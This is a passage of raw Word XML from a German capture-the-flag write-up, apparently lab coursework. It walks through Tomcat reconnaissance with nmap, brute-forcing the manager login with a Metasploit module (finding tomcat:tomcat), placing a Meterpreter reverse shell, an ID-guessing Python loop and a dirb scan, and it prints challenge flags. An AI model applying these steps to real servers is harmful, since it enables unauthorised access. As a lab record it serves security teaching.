      </w:r>
    </w:p>
    <w:p w14:paraId="5CE45C6C" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>print('differing id: ' + str(i))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBA84B2" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>print('hash of ' + str(i)+ ': ' + hashlib.md5(i).hexdigest())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71818092" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>print('')</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="102E4E10" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B757A60" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>start += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E4A86A" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="131DC7CC" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:t>print('end testing with ' + str(end))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7886960D" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68E35D10" w14:textId="0DF6A329" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:r>
        <w:t>Lässt man dieses Skript, dass sie Zahlen von 0001 bis 0100 testet laufen, so findet man heraus, dass es sich bei Batmans ID um die 0012 handelt.</w:t>
      </w:r>
      <w:r w:rsidR="00BF5FD5">
        <w:t xml:space="preserve"> Sendet man diesen Request nun in Burp oder lässt sich den Inhalt von dem Python Skript ausgeben, so erhält man eine Begrüßung und die Flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DE2027" w14:textId="1C03D14C" w:rsidR="00BF5FD5" w:rsidRDefault="00BF5FD5" w:rsidP="00D72E51">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A1B09A3" wp14:editId="2C0F3C01">
            <wp:extent cx="5400675" cy="872490"/>
            <wp:effectExtent l="0" t="0" r="9525" b="381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872490"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5980FEE0" w14:textId="1FB284F2" w:rsidR="00BF5FD5" w:rsidRDefault="00BF5FD5" w:rsidP="00BF5FD5">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r w:rsidRPr="00BF5FD5">
        <w:t>b4man_c0ns0le_{2dbedc1cf5ed51a59bc2c6755c6dc0fccdbce14b852bb6d76d0d8a34}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA2E865" w14:textId="67E8D5C7" w:rsidR="004867F1" w:rsidRDefault="004867F1" w:rsidP="00BF5FD5">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A5E2F86" w14:textId="3BF1AF36" w:rsidR="004867F1" w:rsidRDefault="004867F1" w:rsidP="004867F1">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc438863"/>
      <w:r>
        <w:t>Level 3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="41DB8967" w14:textId="35C4EBF6" w:rsidR="00E5048C" w:rsidRPr="00E5048C" w:rsidRDefault="007819CD" w:rsidP="00E5048C">
      <w:r>
        <w:t xml:space="preserve">Nicht bearbeitet </w:t>
      </w:r>
      <w:r w:rsidR="0016411F">
        <w:t>:/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D879A34" w14:textId="0C21E0FB" w:rsidR="000A11B0" w:rsidRDefault="000A11B0" w:rsidP="000A11B0">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc438864"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Robin</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="0AC0C1BF" w14:textId="5EC29AAA" w:rsidR="006D5887" w:rsidRDefault="006D5887" w:rsidP="006D5887">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc438865"/>
      <w:r>
        <w:t>Level 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="6AB466F0" w14:textId="052ADF37" w:rsidR="006D5887" w:rsidRDefault="006D5887" w:rsidP="006D5887">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc438866"/>
      <w:r>
        <w:t>Tomcat Port:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="58C1E95E" w14:textId="7B4B71F9" w:rsidR="006E65A5" w:rsidRPr="006E65A5" w:rsidRDefault="006E65A5" w:rsidP="006E65A5">
      <w:r>
        <w:t>Der Port auf dem Tomcat läuft lässt sich ganz einfach mit nmap herausfinden</w:t>
      </w:r>
      <w:r w:rsidR="007F1373">
        <w:t>, Befehl siehe unten:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDDA3B0" w14:textId="0DF98C46" w:rsidR="006D5887" w:rsidRDefault="006D5887" w:rsidP="006D5887">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AB7673A" wp14:editId="7D15716C">
            <wp:extent cx="5400675" cy="15944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1594485"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39872076" w14:textId="309ECD2E" w:rsidR="006D5887" w:rsidRDefault="000145DA" w:rsidP="006D5887">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc438867"/>
      <w:r>
        <w:t>Tomcat Version</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="57321ED3" w14:textId="58C5C4E8" w:rsidR="007F1373" w:rsidRPr="007F1373" w:rsidRDefault="007F1373" w:rsidP="007F1373">
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00957EFB">
        <w:t xml:space="preserve">uch die Version lässt sich ganz einfach herausfinden, zum Beispiel, indem man einen Pfad </w:t>
      </w:r>
      <w:r w:rsidR="000B7280">
        <w:t>aufruft, den der Tomcat nicht kennt. So erhält man eine</w:t>
      </w:r>
      <w:r w:rsidR="003713AC">
        <w:t xml:space="preserve">n Status 404 Seite nicht gefunden und kann unten auch die Version des Tomcat Servers sehen, da hier noch die Standard Ansicht </w:t>
      </w:r>
      <w:r w:rsidR="008A3D6D">
        <w:t>eingestellt ist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1AA4F2" w14:textId="2A8E2525" w:rsidR="000145DA" w:rsidRDefault="000145DA" w:rsidP="000145DA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CD14EE6" wp14:editId="095FC5D5">
            <wp:extent cx="5400675" cy="1932305"/>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1932305"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A33B949" w14:textId="33CFF981" w:rsidR="000145DA" w:rsidRDefault="000145DA" w:rsidP="000145DA">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc438868"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Tomcat Manager URL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="4CA38E0C" w14:textId="6A161D18" w:rsidR="000145DA" w:rsidRDefault="000145DA" w:rsidP="000145DA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05C48D63" wp14:editId="482AE5B9">
            <wp:extent cx="5400675" cy="1871345"/>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1871345"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6704D9" w14:textId="69E00E9C" w:rsidR="000145DA" w:rsidRDefault="000145DA" w:rsidP="000145DA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5351F199" wp14:editId="14A7EBED">
            <wp:extent cx="5400675" cy="7048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704850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="539D5634" w14:textId="2142F564" w:rsidR="000145DA" w:rsidRDefault="000145DA" w:rsidP="000145DA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A96EFB1" wp14:editId="7281FBA2">
            <wp:extent cx="5400675" cy="662940"/>
            <wp:effectExtent l="0" t="0" r="952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662940"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CCCDCE" w14:textId="0D44F828" w:rsidR="000145DA" w:rsidRDefault="0025020B" w:rsidP="000145DA">
      <w:r>
        <w:t>Der Manager kann unter d</w:t>
      </w:r>
      <w:r w:rsidR="00693458">
        <w:t>em Pfad /</w:t>
      </w:r>
      <w:r w:rsidR="00442CE0">
        <w:t xml:space="preserve">manager/html gefunden werden. Den Pfad erhält man indem man sich die Erklärung </w:t>
      </w:r>
      <w:r w:rsidR="001F7AD5">
        <w:t>von Tomcat anschaut die gezeigt wird</w:t>
      </w:r>
      <w:r w:rsidR="00B50BD8">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="001F7AD5">
        <w:t xml:space="preserve"> nachdem Tomcat aufgesetzt wurde</w:t>
      </w:r>
      <w:r w:rsidR="00B50BD8">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008719DF">
        <w:t xml:space="preserve"> Ruft man die Url dann auf so wird man nach dem Passwort gefragt, das in den nächsten Aufgaben herausgefunden werden soll</w:t>
      </w:r>
      <w:r w:rsidR="00926DDD">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0A131A" w14:textId="7FE64F7B" w:rsidR="000145DA" w:rsidRDefault="000145DA" w:rsidP="000145DA">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc438869"/>
      <w:r>
        <w:t>URL der Schwachstellenliste</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="41842722" w14:textId="1AEFF1F9" w:rsidR="000145DA" w:rsidRDefault="0014731B" w:rsidP="003619EC">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:hyperlink r:id="rId42" w:history="1">
        <w:r w:rsidR="003619EC" w:rsidRPr="00816A69">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://tomcat.apache.org/security</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1505D99F" w14:textId="6B5A7165" w:rsidR="003619EC" w:rsidRDefault="00926DDD" w:rsidP="00926DDD">
      <w:r>
        <w:t>Unter dieser Url findet man die bekannten Schwachstellen der verschiedenen Tomcat versionen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140728CF" w14:textId="2FE4111D" w:rsidR="003619EC" w:rsidRDefault="003619EC" w:rsidP="003619EC">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc438870"/>
      <w:r>
        <w:t>Metasploit Module:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="5B715B67" w14:textId="2BED2E38" w:rsidR="003619EC" w:rsidRDefault="003619EC" w:rsidP="003619EC">
      <w:r>
        <w:t>Die Module, die Tomcat bezogen sind, findet man in Metasploit, indem man nach dem Starten des Metasploit Frameworks folgenden Befehl eingibt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4512D623" w14:textId="287B84E0" w:rsidR="003619EC" w:rsidRDefault="003619EC" w:rsidP="003619EC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4167120B" wp14:editId="04EE7C0C">
            <wp:extent cx="5400675" cy="4159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4159250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A53BED" w14:textId="657E9224" w:rsidR="003619EC" w:rsidRDefault="003619EC" w:rsidP="003619EC">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc438871"/>
      <w:r>
        <w:t>Level 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="43B95FFF" w14:textId="3BDC5B9A" w:rsidR="003619EC" w:rsidRPr="00FF74EB" w:rsidRDefault="003619EC" w:rsidP="003619EC">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc438872"/>
      <w:r w:rsidRPr="00FF74EB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Brute Force der Manager App Credentials</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="0FB2FA04" w14:textId="2ED5724C" w:rsidR="003619EC" w:rsidRPr="007614AA" w:rsidRDefault="00835B0B" w:rsidP="003619EC">
      <w:r w:rsidRPr="007614AA">
        <w:t xml:space="preserve">Das </w:t>
      </w:r>
      <w:r w:rsidRPr="007614AA">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>auxiliary/scanner/http/tomcat_mgr_login</w:t>
      </w:r>
      <w:r w:rsidR="007614AA" w:rsidRPr="007614AA">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007614AA" w:rsidRPr="007614AA">
        <w:t xml:space="preserve">Modul kann verwendet werden um den Usernamen und das Passwort herauszufinden. Dazu müssen der Port und der Host angegeben </w:t>
      </w:r>
      <w:r w:rsidR="007614AA">
        <w:t>we</w:t>
      </w:r>
      <w:r w:rsidR="007614AA" w:rsidRPr="007614AA">
        <w:t>rden.</w:t>
      </w:r>
      <w:r w:rsidR="001F0579">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177CC19A" w14:textId="798C5A63" w:rsidR="007614AA" w:rsidRDefault="007614AA" w:rsidP="007614AA">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc438873"/>
      <w:r w:rsidRPr="007614AA">
        <w:t>Passwort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> und Username</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="18748399" w14:textId="0D12A28A" w:rsidR="007614AA" w:rsidRDefault="007614AA" w:rsidP="007614AA">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Das Metasploit Modul findet die Username Passwort Kombination </w:t>
      </w:r>
      <w:r w:rsidRPr="007614AA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>tomcat:tomcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF23F6F" w14:textId="1F494505" w:rsidR="007614AA" w:rsidRDefault="007614AA" w:rsidP="007614AA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35A5CA6A" wp14:editId="0B862505">
            <wp:extent cx="5400675" cy="441325"/>
            <wp:effectExtent l="0" t="0" r="9525"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441325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E99A05" w14:textId="76781EC2" w:rsidR="007614AA" w:rsidRDefault="007614AA" w:rsidP="007614AA">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc438874"/>
      <w:r>
        <w:t>Meterpreter Reverse Shell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="7940DD1A" w14:textId="62B6695F" w:rsidR="0055381C" w:rsidRPr="0055381C" w:rsidRDefault="0055381C" w:rsidP="0055381C">
      <w:r>
        <w:t xml:space="preserve">Die Meterpreter Reverse Shell kann mit dem richtigen Exploit ganz einfach </w:t>
      </w:r>
      <w:r w:rsidR="00F86E37">
        <w:t>platziert werden</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Dazu </w:t>
      </w:r>
      <w:r w:rsidR="0052716E">
        <w:t>muss der Exploit ausgewählt werden und die Einstellungen wie unten aufgeführt angepasst werden.</w:t>
      </w:r>
      <w:r w:rsidR="00F86E37">
        <w:t xml:space="preserve"> Wichtig ist, </w:t>
      </w:r>
      <w:r w:rsidR="00897C41">
        <w:t>den FingerPrintCheck  auszuschalten, da sonst ein Fehler auftritt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3A2348" w14:textId="5A3EABC2" w:rsidR="00AE7DF0" w:rsidRDefault="00AE7DF0" w:rsidP="00AE7DF0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29EA0A8A" wp14:editId="1AA27032">
            <wp:extent cx="5400675" cy="3985260"/>
            <wp:effectExtent l="0" t="0" r="9525"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985260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="31502086" w14:textId="0771B9C4" w:rsidR="00AE7DF0" w:rsidRDefault="00AE7DF0" w:rsidP="00AE7DF0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78EFBB37" wp14:editId="4B79CCED">
            <wp:extent cx="4986991" cy="3613150"/>
            <wp:effectExtent l="0" t="0" r="4445" b="635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8483" cy="3614231"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F05385" w14:textId="3BA73890" w:rsidR="0022019F" w:rsidRPr="004B5075" w:rsidRDefault="0022019F" w:rsidP="0022019F">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B5075">
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>Flag: flag_holy_gr4p_b4man_{a481623fd7b6027e6f2fdb757808837c97f0e26b3b1014a1b5e2a347}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F895298" w14:textId="4D590399" w:rsidR="007614AA" w:rsidRDefault="007614AA" w:rsidP="007614AA">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc438875"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Tomcat User</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="6AEBD308" w14:textId="5EC93F83" w:rsidR="00BE0866" w:rsidRPr="00BE0866" w:rsidRDefault="00C60919" w:rsidP="00BE0866">
      <w:r>
        <w:t>Ist man auf dem System kann der User unter dem Tomcat läuft ganz einfach herausgefunden werden. Dabei muss nur beachtet werden, dass die meterpreter shell nicht die selben Befehle wie eine Bash besitzt</w:t>
      </w:r>
      <w:r w:rsidR="00C06198">
        <w:t>. Man kann nun entweder zu einer nomalen Shell wechseln(über den Befehl shell?) oder man schaut sich mit dem Befehl „ps“ die Prozesse an</w:t>
      </w:r>
      <w:r w:rsidR="00011514">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED23D76" w14:textId="32DAFAB1" w:rsidR="00B27A9A" w:rsidRPr="00B27A9A" w:rsidRDefault="00B27A9A" w:rsidP="00B27A9A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15D021BC" wp14:editId="3E673C18">
            <wp:extent cx="5400675" cy="2320925"/>
            <wp:effectExtent l="0" t="0" r="9525" b="317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2320925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="637BF6DC" w14:textId="12F957C3" w:rsidR="007614AA" w:rsidRDefault="007614AA" w:rsidP="007614AA">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc438876"/>
      <w:r>
        <w:t>Bonus</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="02A88E37" w14:textId="7231DA10" w:rsidR="004E1030" w:rsidRPr="004E1030" w:rsidRDefault="004E1030" w:rsidP="004E1030">
      <w:r>
        <w:t>Nicht bearbeitet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E35CCB7" w14:textId="224DDD32" w:rsidR="000A11B0" w:rsidRDefault="000A11B0" w:rsidP="000A11B0">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc438877"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>M&amp;M’s</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="2A43123E" w14:textId="212E6F0D" w:rsidR="00153290" w:rsidRDefault="004161BB" w:rsidP="00153290">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc438878"/>
      <w:r>
        <w:t>Level 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="7B6AD84D" w14:textId="1F2FF908" w:rsidR="00153290" w:rsidRDefault="00153290" w:rsidP="00153290">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc438879"/>
      <w:r>
        <w:t>Application Backup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="0E716F9E" w14:textId="364BFF9B" w:rsidR="00ED6924" w:rsidRPr="00ED6924" w:rsidRDefault="00ED6924" w:rsidP="00ED6924">
      <w:r>
        <w:t>Macht man mit Dirb einen Scan, so findet man dir</w:t>
      </w:r>
      <w:r w:rsidR="00BB0699">
        <w:t>ekt das Backup Verzeichnis und kann dieses herunterladen und entpacken.</w:t>
      </w:r>
      <w:r w:rsidR="001E5F84">
        <w:t xml:space="preserve"> Darin findet sich dann auch die erste Flag</w:t>
      </w:r>
      <w:r w:rsidR="000C1239">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8317B7" w14:textId="436D97FB" w:rsidR="00153290" w:rsidRDefault="00153290" w:rsidP="00153290">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EEC9B90" wp14:editId="50B47490">
            <wp:extent cx="5400675" cy="40671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4067175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6C4B94" w14:textId="74D619D8" w:rsidR="00153290" w:rsidRDefault="00153290" w:rsidP="00153290">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r w:rsidRPr="00153290">
        <w:t>s0_many_c0lors_{39ea0a55ff4fc7dc50d185bcc327c8b7090990cb41be43c64d998c57}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AA7971" w14:textId="5B535CEE" w:rsidR="00153290" w:rsidRDefault="00153290" w:rsidP="00153290">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B4E9222" wp14:editId="44637C52">
            <wp:extent cx="5400675" cy="1726565"/>
            <wp:effectExtent l="0" t="0" r="9525"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1726565"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="28210CD9" w14:textId="6F317CEF" w:rsidR="00153290" w:rsidRDefault="00153290" w:rsidP="00153290">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc438880"/>
      <w:r>
        <w:t>Level 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="5892DB74" w14:textId="791064E8" w:rsidR="00775EB8" w:rsidRDefault="00775EB8" w:rsidP="00775EB8">
      <w:r>
